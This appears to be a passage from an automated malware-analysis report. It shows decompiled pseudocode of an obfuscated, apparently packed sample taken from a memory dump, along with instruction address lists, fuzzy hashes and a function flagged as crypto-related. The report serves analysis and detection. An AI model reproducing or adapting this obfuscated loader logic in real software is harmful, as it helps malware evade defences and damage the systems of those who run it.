							 *(_t570 + 0x41c8cd) =  *(_t570 + 0x41c8cd) & 0x00000000;
							 *(_t570 + 0x41c8cd) =  *(_t570 + 0x41c8cd) ^ _t696 -  *(_t744 - 0x10) ^ _t491;
							_t685 =  *(_t744 - 0x10);
						}
						 *(_t744 - 0x10) = _t572;
						_t575 =  *(_t744 - 0x10);
						_t322 = _t575 + 0x41cb0b; // 0x41cb0b
						 *(_t744 - 0x14) = 0;
						 *_t761 =  *_t761 | _t322;
						_t495 =  *((intOrPtr*)(_t575 + 0x41f060))( *(_t744 - 0x14));
						 *_t761 = _t495;
						_t327 = _t575 + 0x41cda5; // 0x41cda5
						 *_t761 = _t327;
						_t497 =  *((intOrPtr*)(_t575 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x10));
						_t762 = _t761 - 0xfffffffc;
						 *_t762 =  *_t762 ^ _t744;
						_t745 = _t497;
						_t498 = _t745 +  *_t761;
						_t747 = 0;
						 *(_t747 - 0x14) = _t712;
						_t615 =  *(_t575 + 0x41c96a);
						_t715 =  *(_t747 - 0x14);
						if(_t615 > _t498) {
							_t333 = _t575 + 0x41cb0b; // 0x41cb0b
							 *_t762 =  *_t762 & 0x00000000;
							 *_t762 =  *_t762 | _t333;
							_t334 = _t575 + 0x41cda5; // 0x41cda5
							 *(_t747 - 0x14) =  *(_t747 - 0x14) & 0x00000000;
							 *_t762 =  *_t762 | _t334;
							_t498 =  *((intOrPtr*)(_t575 + 0x41f064))( *(_t747 - 0x14), _t747);
						}
						 *_t339 = _t498;
						 *_t341 =  *(_t747 - 0x10);
						_t762[1] =  *(_t747 - 0xc);
						_t577 = _t575;
						_t344 = _t577 + 0x41cee2; // 0x41cee2
						 *_t762 = _t344;
						_t346 = _t577 + 0x41d33a; // 0x41d33a
						 *(_t747 - 0x14) = 0;
						 *_t762 =  *_t762 | _t346;
						_t501 =  *((intOrPtr*)(_t577 + 0x41f068))( *(_t747 - 0x14),  *(_t747 - 0x10), _t615);
						 *(_t577 + 0x41d1da) =  *(_t577 + 0x41d1da) & 0x00000000;
						 *(_t577 + 0x41d1da) =  *(_t577 + 0x41d1da) | _t715 -  *_t762 | _t501;
						_t718 = _t715;
						 *(_t747 - 0x10) = _t685;
						_t688 =  *(_t747 - 0x10);
						 *_t762 =  *_t762 - _t657;
						 *_t762 =  *_t762 ^ (_t501 & 0x00000000 | _t685 ^  *(_t747 - 0x10) |  *(_t747 - 4));
						_t358 = _t577 + 0x41d2b3; // 0x41d2b3
						 *_t762 =  *_t762 - _t657;
						 *_t762 = _t358;
						_t359 = _t577 + 0x41cb87; // 0x41cb87
						 *(_t747 - 0x10) =  *(_t747 - 0x10) & 0x00000000;
						 *_t762 =  *_t762 + _t359;
						_t506 =  *((intOrPtr*)(_t577 + 0x41f068))( *(_t747 - 0x10), _t657, _t657);
						 *(_t747 - 0x10) = _t615;
						 *(_t577 + 0x41cf9a) =  *(_t577 + 0x41cf9a) & 0x00000000;
						 *(_t577 + 0x41cf9a) =  *(_t577 + 0x41cf9a) | _t615 ^  *(_t747 - 0x10) | _t506;
						_t618 =  *(_t747 - 0x10);
						_t763 =  &(_t762[1]);
						 *(_t747 - 0x10) = 0;
						 *_t763 =  *_t763 ^  *_t762;
						_t373 = _t577 + 0x41c922; // 0x41c922
						 *(_t747 - 0x10) = 0;
						 *_t763 =  *_t763 | _t373;
						_t376 = _t577 + 0x41c97d; // 0x41c97d
						 *_t763 =  *_t763 & 0x00000000;
						 *_t763 =  *_t763 + _t376;
						_t511 =  *((intOrPtr*)(_t577 + 0x41f068))(_t618,  *(_t747 - 0x10),  *(_t747 - 0x10));
						 *(_t577 + 0x41cae1) =  *(_t577 + 0x41cae1) & 0x00000000;
						 *(_t577 + 0x41cae1) =  *(_t577 + 0x41cae1) | _t747 & 0x00000000 | _t511;
						_t744 = _t747;
						_t512 =  *((intOrPtr*)(_t577 + 0x41f050))();
						 *(_t744 - 0x14) = 0;
						 *_t763 =  *_t763 + _t512;
						_t385 = _t577 + 0x41c197; // 0x41c197
						 *(_t744 - 0x14) = 0;
						 *_t763 =  *_t763 | _t385;
						_t514 =  *((intOrPtr*)(_t577 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x14));
						 *(_t744 - 0x14) = 0;
						 *_t763 =  *_t763 | _t514;
						_t391 = _t577 + 0x41c46f; // 0x41c46f
						 *(_t744 - 0x14) = 0;
						 *_t763 =  *_t763 ^ _t391;
						_t516 =  *((intOrPtr*)(_t577 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x14));
						_pop( *_t395);
						_t620 = (_t618 & 0x00000000) +  *(_t744 - 0x10);
						 *_t397 = _t516;
						 *(_t744 - 0x14) =  *(_t744 - 0x14) + _t620;
						_push( *(_t744 - 0x14));
						_pop(_t517);
						_t579 = _t577;
						 *(_t744 - 0x10) = _t688;
						_t609 = _t620 & 0x00000000 ^ _t688 -  *(_t744 - 0x10) ^  *(_t579 + 0x41c9d0);
						_t685 =  *(_t744 - 0x10);
						if(_t609 > _t517) {
							_t405 = _t579 + 0x41c197; // 0x41c197
							 *_t763 =  *_t763 & 0x00000000;
							 *_t763 =  *_t763 + _t405;
							_t406 = _t579 + 0x41c46f; // 0x41c46f
							 *(_t744 - 0x10) = 0;
							 *_t763 =  *_t763 ^ _t406;
							_t517 =  *((intOrPtr*)(_t579 + 0x41f064))( *(_t744 - 0x10), _t718);
							 *(_t579 + 0x41cfe1) =  *(_t579 + 0x41cfe1) & 0x00000000;
							 *(_t579 + 0x41cfe1) =  *(_t579 + 0x41cfe1) | _t744 ^  *_t763 ^ _t517;
							_t744 = _t744;
						}
						_t761 =  &(_t763[1]);
						 *_t761 =  *_t761 ^ _t744;
						 *_t761 = _t718;
						 *_t761 = _t517 & 0x00000000 |  *_t763;
						_t522 = 0;
						 *_t761 = _t657;
						 *((intOrPtr*)( *((intOrPtr*)(_t744 - 8)))) = _t522;
						_t660 = 0;
						 *_t415 = _t744;
						 *_t761 = 4;
						_t523 = _t579;
						 *_t417 = 0 ^  *(_t744 - 0x14);
						 *(_t744 - 0x14) =  *(_t744 - 0x14) + _t523;
						_push( *(_t744 - 0x14));
						_pop(_t712);
						_t651 = _t660;
						 *_t422 =  *((intOrPtr*)(_t744 - 8));
						 *(_t744 - 0x10) =  *(_t744 - 0x10) + _t523;
						_push( *(_t744 - 0x10));
						_pop( *_t426);
						_t570 = _t579;
					} while ( *_t712 != 0);
					_t680 = _t685 + 0x14;
					_t701 = _t712;
				} while ( *_t680 != 0 ||  *(_t680 + 0x10) != 0);
				 *_t761 =  *_t761 ^ _t523;
				_t555 = _t523;
				return _t555;
			}

0x03335262
0x03335262
0x03335268
0x0333526f
0x03335272
0x0333527b
0x0333527c
0x0333527f
0x03335282
0x03335288
0x03335290
0x03335297
0x033352a0
0x033352a6
0x033352ac
0x033352ad
0x033352b1
0x033352b4
0x033352ba
0x033352c2
0x033352c9
0x033352d2
0x033352da
0x033352de
0x033352df
0x033352e5
0x033352e6
0x033352ea
0x033352ed
0x033352f3
0x033352f4
0x033352f8
0x033352fb
0x03335303
0x0333530a
0x03335310
0x03335311
0x03335314
0x03335405
0x0333540b
0x0333540c
0x03335413
0x03335417
0x0333541a
0x03335421
0x03335424
0x03335427
0x03335433
0x0333543a
0x03335440
0x0333531a
0x0333531a
0x03335320
0x0333532a
0x0333532d
0x03335333
0x0333533a
0x03335343
0x03335346
0x03335349
0x0333534c
0x0333534d
0x03335356
0x03335359
0x03335365
0x0333536c
0x03335372
0x03335372
0x03335445
0x03335445
0x03335448
0x0333544f
0x03335452
0x03335455
0x0333545d
0x03335464
0x0333546a
0x0333546b
0x0333546e
0x03335477
0x0333547a
0x03335480
0x03335487
0x0333548a
0x03335491
0x03335495
0x03335498
0x033354a0
0x033354a3
0x033354aa
0x033354ad
0x033354b0
0x033354b3
0x033354b4
0x033354b5
0x033354c4
0x033354c6
0x033354cb
0x033354cd
0x033354d6
0x033354d9
0x033354df
0x033354e6
0x033354e9
0x033354e9
0x033354ef
0x033354f7
0x033354fe
0x03335504
0x03335507
0x03335515
0x03335519
0x0333551d
0x03335520
0x03335527
0x0333552b
0x0333552e
0x03335535
0x03335539
0x0333553c
0x03335542
0x0333554a
0x03335551
0x03335557
0x0333555a
0x03335562
0x03335565
0x03335568
0x0333556b
0x0333556e
0x0333556f
0x03335576
0x03335579
0x0333557c
0x03335582
0x0333558c
0x03335595
0x03335596
0x03335599
0x0333559c
0x033355a2
0x033355a5
0x033355a8
0x033355ab
0x033355ad
0x033355b1
0x033355b4
0x033355bb
0x033355be
0x033355c1
0x033355c7
0x033355cf
0x033355d6
0x033355dc
0x033355e8
0x033355eb
0x033355ed
0x033355f0
0x033355f1
0x033355fb
0x033355fe
0x03335607
0x0333560a
0x03335611
0x03335614
0x03335617
0x0333561d
0x03335624
0x03335627
0x0333562f
0x03335632
0x03335635
0x0333563c
0x0333563d
0x03335640
0x0333564e
0x03335650
0x03335653
0x03335655
0x0333565b
0x03335662
0x03335665
0x0333566b
0x03335675
0x03335678
0x0333567e
0x03335685
0x0333568b
0x0333568b
0x03335694
0x0333569c
0x033356a0
0x033356a4
0x033356a6
0x033356a8
0x033356ac
0x033356af
0x033356b8
0x033356bb
0x033356c2
0x033356c6
0x033356c9
0x033356cf
0x033356d6
0x033356dc
0x033356e1
0x033356e4
0x033356e8
0x033356eb
0x033356ee
0x033356f4
0x033356fe
0x03335701
0x03335707
0x0333570f
0x03335716
0x0333571f
0x03335725
0x0333572f
0x03335732
0x03335738
0x03335742
0x03335745
0x0333574b
0x03335753
0x0333575a
0x03335760
0x0333576c
0x0333576f
0x03335777
0x0333577b
0x0333577e
0x03335781
0x0333578a
0x0333578d
0x03335794
0x03335797
0x0333579a
0x033357a0
0x033357a7
0x033357ad
0x033357b0
0x033357b6
0x03335a4d
0x03335a51
0x03335a59
0x03335a5c
0x03335a5f
0x03335a67
0x03335a6e
0x03335a74
0x03335a75
0x03335a7f
0x03335a83
0x03335a8d
0x03335a91
0x03335a94
0x03335a9a
0x03335aa1
0x03335aa7
0x03335aaa
0x03335ab8
0x03335abb
0x03335ac5
0x03335ac9
0x03335acc
0x03335ad2
0x03335ada
0x03335ae1
0x03335ae7
0x033357bc
0x033357bc
0x033357c3
0x033357c6
0x033357c9
0x033357cf
0x033357d9
0x033357dc
0x033357e3
0x033357e6
0x033357e9
0x033357f5
0x033357f8
0x033357fd
0x03335801
0x03335804
0x03335806
0x03335807
0x03335816
0x03335818
0x0333581d
0x0333581f
0x03335826
0x0333582a
0x0333582d
0x03335836
0x03335839
0x03335839
0x03335845
0x0333584c
0x03335852
0x03335854
0x03335858
0x0333585b
0x03335864
0x0333586d
0x0333586e
0x03335871
0x03335874
0x0333587a
0x0333587c
0x03335883
0x03335887
0x0333588a
0x03335890
0x0333589a
0x0333589d
0x033358a3
0x033358aa
0x033358ad
0x033358b9
0x033358bc
0x033358c3
0x033358c6
0x033358c9
0x033358cc
0x033358cd
0x033358ce
0x033358dd
0x033358df
0x033358e4
0x033358e6
0x033358ef
0x033358f2
0x033358f9
0x033358fd
0x03335900
0x03335900
0x03335908
0x0333590f
0x03335915
0x03335918
0x0333591c
0x03335920
0x03335922
0x03335923
0x03335929
0x03335930
0x03335933
0x03335939
0x03335943
0x03335946
0x0333594c
0x03335954
0x0333595b
0x0333596f
0x03335970
0x03335977
0x0333597b
0x0333597e
0x03335987
0x0333598a
0x03335996
0x0333599d
0x033359a3
0x033359a4
0x033359a5
0x033359a8
0x033359ab
0x033359ae
0x033359b4
0x033359bb
0x033359be
0x033359c7
0x033359ca
0x033359d2
0x033359d9
0x033359df
0x033359e2
0x033359e5
0x033359e8
0x033359ef
0x033359f3
0x033359f6
0x033359ff
0x03335a02
0x03335a08
0x03335a10
0x03335a17
0x03335a1d
0x03335a1d
0x03335aea
0x03335af8
0x03335afb
0x03335b01
0x03335b0b
0x03335b0e
0x03335b17
0x03335b1a
0x03335b23
0x03335b26
0x03335b35
0x03335b3a
0x03335b3e
0x03335b41
0x03335b43
0x03335b44
0x03335b4f
0x03335b51
0x03335b56
0x03335b58
0x03335b5f
0x03335b63
0x03335b66
0x03335b6c
0x03335b73
0x03335b76
0x03335b76
0x03335b7d
0x03335b83
0x03335b8e
0x03335b92
0x03335b93
0x03335b9c
0x03335b9f
0x03335ba5
0x03335baf
0x03335bb2
0x03335bbe
0x03335bc5
0x03335bcb
0x03335bcc
0x03335bda
0x03335bde
0x03335be1
0x03335be4
0x03335beb
0x03335bee
0x03335bf1
0x03335bf7
0x03335bfe
0x03335c01
0x03335c07
0x03335c0f
0x03335c16
0x03335c1c
0x03335c28
0x03335c2b
0x03335c35
0x03335c38
0x03335c3e
0x03335c48
0x03335c4b
0x03335c52
0x03335c56
0x03335c59
0x03335c65
0x03335c6c
0x03335c72
0x03335c73
0x03335c79
0x03335c83
0x03335c86
0x03335c8c
0x03335c96
0x03335c99
0x03335c9f
0x03335ca9
0x03335cac
0x03335cb2
0x03335cbc
0x03335cbf
0x03335ccb
0x03335cce
0x03335cd5
0x03335cd8
0x03335cdb
0x03335cde
0x03335cdf
0x03335ce0
0x03335cef
0x03335cf1
0x03335cf6
0x03335cf8
0x03335cff
0x03335d03
0x03335d06
0x03335d0c
0x03335d16
0x03335d19
0x03335d25
0x03335d2c
0x03335d32
0x03335d32
0x03335d3c
0x03335d40
0x03335d43
0x03335d48
0x03335d52
0x03335d55
0x03335d5c
0x03335d5e
0x03335d61
0x03335d68
0x03335d6f
0x03335d74
0x03335d77
0x03335d7a
0x03335d7d
0x03335d7e
0x03335d85
0x03335d88
0x03335d8b
0x03335d8e
0x03335d91
0x03335d92
0x03335da4
0x03335da6
0x03335da7
0x03335dbb
0x03335dbe
0x03335dd0

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2616795092f367d06362dbc9c4ea195590f79d012455bc9ff3e9898c1f741067
Instruction ID: aa4feb9a29b77fc3428e74f82cbf1205944fa7f9d4441d1363337bf845773e1a
Opcode Fuzzy Hash: 2616795092f367d06362dbc9c4ea195590f79d012455bc9ff3e9898c1f741067
Instruction Fuzzy Hash: 9D724272844219DFEF04DFA0C9897EEBBF0FF08311F19486AD889AA145D7741664CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 03335378, Relevance: .7, Instructions: 726
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E03335378(signed int __ebx, signed int __ecx, intOrPtr* __edi, signed int __esi) {
				void* _t419;
				void* _t421;
				signed int _t422;
				signed int _t425;
				signed int _t428;
				intOrPtr _t430;
				signed int _t432;
				void* _t434;
				signed int _t435;
				signed int _t438;
				signed int _t443;
				signed int _t449;
				void* _t450;
				signed int _t454;
				void* _t456;
				intOrPtr _t457;
				intOrPtr _t460;
				signed int _t462;
				void* _t463;
				signed int _t465;
				signed int _t470;
				signed int _t472;
				signed int _t475;
				signed int _t478;
				signed int _t482;
				void* _t484;
				void* _t485;
				signed int _t488;
				signed int _t493;
				signed int _t498;
				void* _t499;
				signed int _t501;
				void* _t503;
				signed int _t504;
				intOrPtr _t509;
				signed int _t510;
				signed int _t512;
				void* _t514;
				signed int _t515;
				signed int _t519;
				void* _t521;
				signed int _t522;
				signed int _t525;
				signed int _t528;
				intOrPtr _t531;
				signed int _t539;
				signed int _t541;
				void* _t542;
				signed int _t551;
				signed int _t554;
				signed int _t557;
				signed int _t559;
				signed int _t562;
				void* _t564;
				void* _t566;
				signed int _t573;
				signed int _t575;
				void* _t576;
				signed int _t581;
				signed int _t583;
				void* _t586;
				signed int _t588;
				signed int _t590;
				signed int _t596;
				void* _t599;
				signed int _t602;
				signed int _t605;
				signed int _t607;
				signed int _t610;
				signed int _t612;
				signed int _t614;
				signed int _t616;
				signed int _t619;
				signed int _t622;
				signed int _t626;
				signed int _t629;
				signed int _t632;
				signed int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				signed int _t647;
				void* _t650;
				signed int _t654;
				signed int _t656;
				signed int _t659;
				signed int _t662;
				intOrPtr* _t665;
				signed int _t667;
				signed int _t670;
				signed int _t673;
				void* _t676;
				signed int _t678;
				void* _t679;
				signed int _t681;
				signed int _t687;
				signed int _t690;
				void* _t691;
				signed int _t693;
				signed int _t694;
				signed int _t697;
				signed int _t700;
				signed int _t703;
				signed int _t714;
				signed int _t717;
				signed int _t718;
				signed int _t726;
				void* _t727;
				signed int _t729;
				signed int* _t739;
				signed int* _t740;
				signed int* _t741;
				signed int* _t742;
				signed int* _t743;
				signed int* _t744;
				signed int* _t745;
				signed int* _t746;
				signed int* _t747;

				_t686 = __esi;
				_t665 = __edi;
				_t551 = __ebx;
				_push(__esi);
				 *_t739 =  *_t739 ^ __esi;
				 *_t739 =  *_t739 | __ebx + 0x0041c174;
				_t419 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_t619);
				 *_t739 =  *_t739 - _t619;
				 *_t739 =  *_t739 + _t419;
				_push(__edi);
				 *_t739 =  *_t739 & 0x00000000;
				 *_t739 =  *_t739 + __ebx + 0x41c53c;
				_t421 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t740 = _t739 - 0xfffffffc;
				 *(_t726 - 0x14) = _t619;
				_push((__ecx & 0x00000000 ^  *_t739) + _t421);
				_t622 =  *(_t726 - 0x14);
				_pop(_t422);
				 *(_t726 - 0x14) = _t422;
				_t425 =  *(_t726 - 0x14);
				if((0 ^  *(__ebx + 0x41c2dd)) > _t425) {
					 *__esp =  *__esp & 0x00000000;
					 *__esp =  *__esp + __ebx + 0x41c174;
					 *(__ebp - 0x14) =  *(__ebp - 0x14) & 0x00000000;
					 *__esp =  *__esp | __ebx + 0x0041c53c;
					 *((intOrPtr*)(__ebx + 0x41f064))( *(__ebp - 0x14), __ecx);
				}
				 *_t33 = _t425;
				 *_t35 =  *(_t726 - 0x14);
				while(1) {
					L5:
					 *_t36 =  *_t665;
					_t687 =  *(_t726 - 0x14);
					_t38 = _t551 + 0x41d32a; // 0x41d32a
					 *_t740 =  *_t740 & 0x00000000;
					 *_t740 =  *_t740 ^ _t38;
					_t39 = _t551 + 0x41cdb4; // 0x41cdb4
					 *_t740 =  *_t740 ^ _t726;
					 *_t740 = _t39;
					_t428 =  *((intOrPtr*)(_t551 + 0x41f068))(_t726, _t726);
					 *(_t551 + 0x41cada) =  *(_t551 + 0x41cada) & 0x00000000;
					 *(_t551 + 0x41cada) =  *(_t551 + 0x41cada) | _t622 & 0x00000000 ^ _t428;
					_t622 = _t622;
					while(1) {
						_t626 =  *_t740;
						 *_t740 =  *(_t665 + 0x10);
						_t47 = _t551 + 0x41c661; // 0x41c661
						 *_t740 =  *_t740 ^ _t726;
						 *_t740 =  *_t740 + _t47;
						_t430 =  *((intOrPtr*)(_t551 + 0x41f060))(_t622);
						 *_t740 = _t687;
						 *((intOrPtr*)(_t551 + 0x41d31e)) = _t430;
						_t690 = 0;
						 *_t50 = _t726;
						_t51 = _t551 + 0x41c5b3; // 0x41c5b3
						 *_t740 = _t51;
						_t432 =  *((intOrPtr*)(_t551 + 0x41f060))( *(_t726 - 0x10));
						 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
						 *_t740 =  *_t740 ^ _t432;
						_t57 = _t551 + 0x41c868; // 0x41c868
						 *_t740 =  *_t740 & 0x00000000;
						 *_t740 =  *_t740 ^ _t57;
						_t434 =  *((intOrPtr*)(_t551 + 0x41f060))( *(_t726 - 0x14));
						 *_t59 = _t665;
						_t573 = 0 ^  *(_t726 - 0x10);
						 *_t61 = _t434;
						 *(_t726 - 0x14) =  *(_t726 - 0x14) + _t573;
						_push( *(_t726 - 0x14));
						_pop(_t435);
						_t667 = _t665;
						 *(_t726 - 0x14) = _t435;
						_t575 = _t573 & 0x00000000 ^ _t435 & 0x00000000 ^  *(_t551 + 0x41c633);
						_t438 =  *(_t726 - 0x14);
						if(_t575 > _t438) {
							_t68 = _t551 + 0x41c5b3; // 0x41c5b3
							 *_t740 = _t68;
							_t70 = _t551 + 0x41c868; // 0x41c868
							 *(_t726 - 0x10) =  *(_t726 - 0x10) & 0x00000000;
							 *_t740 =  *_t740 | _t70;
							_t438 =  *((intOrPtr*)(_t551 + 0x41f064))( *(_t726 - 0x10),  *(_t726 - 0x14));
						}
						 *(_t726 - 0x10) = _t626;
						 *(_t551 + 0x41c2a0) =  *(_t551 + 0x41c2a0) & 0x00000000;
						 *(_t551 + 0x41c2a0) =  *(_t551 + 0x41c2a0) | _t626 & 0x00000000 ^ _t438;
						_t629 =  *(_t726 - 0x10);
						 *(_t726 - 0x10) = _t551;
						_t554 =  *(_t726 - 0x10);
						 *_t740 =  *_t740 & 0x00000000;
						 *_t740 =  *_t740 | _t438 & 0x00000000 | _t551 & 0x00000000 ^  *(_t726 + 8);
						_t84 = _t554 + 0x41c812; // 0x41c812
						 *_t740 =  *_t740 & 0x00000000;
						 *_t740 =  *_t740 + _t84;
						_t85 = _t554 + 0x41ca65; // 0x41ca65
						 *_t740 =  *_t740 & 0x00000000;
						 *_t740 =  *_t740 | _t85;
						_t443 =  *((intOrPtr*)(_t554 + 0x41f068))(_t575, _t690);
						 *(_t726 - 0x14) = _t667;
						 *(_t554 + 0x41d25f) =  *(_t554 + 0x41d25f) & 0x00000000;
						 *(_t554 + 0x41d25f) =  *(_t554 + 0x41d25f) ^ (_t667 -  *(_t726 - 0x14) | _t443);
						_t670 =  *(_t726 - 0x14);
						 *_t94 = _t575;
						 *_t740 =  *_t740 ^ _t690;
						_push( *((intOrPtr*)(_t726 - 8)));
						_pop(_t691);
						 *((intOrPtr*)(_t726 - 8)) = _t691 +  *(_t726 - 0x10);
						_t693 = 0;
						_t98 = _t554 + 0x41d15d; // 0x41d15d
						 *_t740 =  *_t740 - _t575;
						 *_t740 = _t98;
						_t99 = _t554 + 0x41c260; // 0x41c260
						 *(_t726 - 0x10) = 0;
						 *_t740 =  *_t740 | _t99;
						_push( *((intOrPtr*)(_t554 + 0x41f068))( *(_t726 - 0x10), _t575));
						_pop( *_t103);
						_push( *(_t726 - 0x10));
						_pop( *_t105);
						_push( *((intOrPtr*)(_t670 + 0xc)));
						_pop( *_t107);
						_push( *(_t726 - 0x14));
						_pop(_t576);
						 *_t740 =  *_t740 & 0x00000000;
						 *_t740 =  *_t740 + _t576;
						_t109 = _t554 + 0x41ca52; // 0x41ca52
						 *_t740 =  *_t740 - _t554;
						 *_t740 =  *_t740 + _t109;
						_t449 =  *((intOrPtr*)(_t554 + 0x41f060))(_t554, _t554);
						 *(_t726 - 0x14) = _t629;
						 *(_t554 + 0x41cd09) =  *(_t554 + 0x41cd09) & 0x00000000;
						 *(_t554 + 0x41cd09) =  *(_t554 + 0x41cd09) | _t629 -  *(_t726 - 0x14) ^ _t449;
						_t632 =  *(_t726 - 0x14);
						_t741 = _t740 - 0xfffffffc;
						_push(0);
						 *_t741 =  *_t741 | _t449;
						_push( *_t740);
						_pop(_t450);
						 *_t741 = _t450 +  *(_t726 + 8);
						_t120 = _t554 + 0x41c07f; // 0x41c07f
						 *_t741 = _t120;
						_t454 =  *((intOrPtr*)(_t554 + 0x41f060))( *(_t726 - 0x10),  *(_t726 - 0x14));
						 *_t741 =  *_t741 - _t632;
						 *_t741 =  *_t741 | _t454;
						_t123 = _t554 + 0x41d248; // 0x41d248
						 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
						 *_t741 =  *_t741 | _t123;
						_t456 =  *((intOrPtr*)(_t554 + 0x41f060))( *(_t726 - 0x14), _t632);
						_t581 =  *_t741;
						_t742 =  &(_t741[1]);
						 *(_t726 - 0x10) = _t554;
						_push(_t581 + _t456);
						_t557 =  *(_t726 - 0x10);
						_pop(_t457);
						_t583 = _t581 & 0x00000000 ^ _t632 -  *_t742 ^  *(_t557 + 0x41d0e6);
						_t635 = _t632;
						if(_t583 > _t457) {
							_t131 = _t557 + 0x41c07f; // 0x41c07f
							 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
							 *_t742 =  *_t742 + _t131;
							_t135 = _t557 + 0x41d248; // 0x41d248
							 *(_t726 - 0x14) = 0;
							 *_t742 =  *_t742 | _t135;
							_t457 =  *((intOrPtr*)(_t557 + 0x41f064))( *(_t726 - 0x14),  *(_t726 - 0x14));
							 *(_t726 - 0x10) = _t693;
							 *((intOrPtr*)(_t557 + 0x41cd68)) = _t457;
							_t693 =  *(_t726 - 0x10);
						}
						_pop( *_t142);
						 *_t742 = _t583 & 0x00000000 ^  *(_t726 - 0x10);
						_t586 = _t693;
						_t694 = _t586 +  *(_t726 + 8);
						_t588 = 0;
						 *_t742 =  *_t742 & 0x00000000;
						 *_t742 =  *_t742 | _t588;
						_t145 = _t557 + 0x41d135; // 0x41d135
						 *_t742 = _t145;
						_t147 = _t557 + 0x41c60e; // 0x41c60e
						 *_t742 =  *_t742 & 0x00000000;
						 *_t742 =  *_t742 | _t147;
						_t460 =  *((intOrPtr*)(_t557 + 0x41f068))(_t588,  *(_t726 - 0x10), _t457);
						 *(_t726 - 0x14) = _t635;
						 *((intOrPtr*)(_t557 + 0x41c3e6)) = _t460;
						_t638 =  *(_t726 - 0x14);
						_t590 =  *_t742;
						_t743 = _t742 - 0xfffffffc;
						 *_t743 =  *_t743 - _t638;
						 *_t743 =  *_t743 ^ _t590;
						_t152 = _t557 + 0x41c220; // 0x41c220
						 *(_t726 - 0x14) = 0;
						 *_t743 =  *_t743 + _t152;
						_t462 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x14), _t638);
						 *(_t726 - 0x10) = _t590;
						 *(_t557 + 0x41cf1d) =  *(_t557 + 0x41cf1d) & 0x00000000;
						 *(_t557 + 0x41cf1d) =  *(_t557 + 0x41cf1d) ^ (_t590 ^  *(_t726 - 0x10) | _t462);
						_t463 =  *((intOrPtr*)(_t557 + 0x41f054))();
						 *(_t726 - 0x14) = 0;
						 *_t743 =  *_t743 + _t463;
						_t166 = _t557 + 0x41c49b; // 0x41c49b
						 *(_t726 - 0x10) = 0;
						 *_t743 =  *_t743 + _t166;
						_t465 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10),  *(_t726 - 0x14));
						 *(_t726 - 0x14) = _t694;
						 *(_t557 + 0x41c8aa) =  *(_t557 + 0x41c8aa) & 0x00000000;
						 *(_t557 + 0x41c8aa) =  *(_t557 + 0x41c8aa) | _t694 & 0x00000000 ^ _t465;
						_t697 =  *(_t726 - 0x14);
						_t744 = _t743 - 0xfffffffc;
						 *(_t726 - 0x10) = _t638;
						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
						 *(_t726 - 4) =  *(_t726 - 4) ^ _t638 -  *(_t726 - 0x10) ^ _t465 & 0x00000000 ^  *_t743;
						_t641 =  *(_t726 - 0x10);
						_t183 = _t557 + 0x41c279; // 0x41c279
						 *_t744 = _t183;
						_t185 = _t557 + 0x41d1ea; // 0x41d1ea
						 *_t744 =  *_t744 - _t697;
						 *_t744 = _t185;
						_t470 =  *((intOrPtr*)(_t557 + 0x41f068))(_t697,  *(_t726 - 0x14));
						 *(_t726 - 0x14) =  *(_t726 - 0x10);
						 *(_t557 + 0x41cbc5) = 0 ^ _t470;
						_t596 =  *(_t726 - 0x14);
						do {
							L11:
							if(( *_t697 & 0x80000000) != 0) {
								_t744[1] =  *_t697;
								_t559 = _t557;
								 *_t744 =  *_t744 ^ _t697;
								 *_t744 =  *_t744 ^ _t559 + 0x0041d099;
								_t472 =  *((intOrPtr*)(_t559 + 0x41f060))(_t726);
								 *_t744 = _t596;
								 *(_t559 + 0x41c24c) = 0 ^ _t472;
								_t599 = 0;
								 *_t289 = _t697;
								 *_t744 =  *_t744 & 0x00000000;
								 *_t744 =  *_t744 + _t559 + 0x41cdd2;
								 *_t744 =  *_t744 & 0x00000000;
								 *_t744 =  *_t744 | _t559 + 0x0041c846;
								_t475 =  *((intOrPtr*)(_t559 + 0x41f068))(_t726, _t670);
								 *(_t726 - 0x10) = _t641;
								 *(_t559 + 0x41c9fe) = 0 ^ _t475;
								_t644 =  *(_t726 - 0x10);
								 *(_t726 - 0xc) =  *(_t726 - 0xc) & 0x0000ffff;
								 *_t744 =  *_t744 ^ _t644;
								 *_t744 =  *_t744 | _t559 + 0x0041c9e4;
								 *_t744 =  *_t744 & 0x00000000;
								 *_t744 =  *_t744 ^ _t559 + 0x0041c746;
								_t478 =  *((intOrPtr*)(_t559 + 0x41f068))(_t644, _t644);
								 *(_t726 - 0x14) = _t644;
								 *(_t559 + 0x41c559) =  *(_t559 + 0x41c559) & 0x00000000;
								 *(_t559 + 0x41c559) =  *(_t559 + 0x41c559) ^ (_t644 ^  *(_t726 - 0x14) | _t478);
								_t647 =  *(_t726 - 0x14);
							} else {
								_t192 = _t557 + 0x41c8e1; // 0x41c8e1
								 *_t744 =  *_t744 - _t641;
								 *_t744 =  *_t744 | _t192;
								_t512 =  *((intOrPtr*)(_t557 + 0x41f060))(_t641);
								 *(_t726 - 0x10) = 0;
								 *_t744 =  *_t744 | _t512;
								_t196 = _t557 + 0x41c6e2; // 0x41c6e2
								 *_t744 =  *_t744 - _t557;
								 *_t744 =  *_t744 | _t196;
								_t514 =  *((intOrPtr*)(_t557 + 0x41f060))(_t557,  *(_t726 - 0x10));
								_t610 = (_t596 & 0x00000000) +  *_t744;
								_t747 = _t744 - 0xfffffffc;
								 *_t747 =  *_t747 + _t670;
								_t676 = _t514;
								_t515 = _t676 + _t610;
								_t678 = 0;
								 *(_t726 - 0x10) = _t641;
								_t612 = _t610 & 0x00000000 ^ _t641 ^  *(_t726 - 0x10) ^  *(_t557 + 0x41c521);
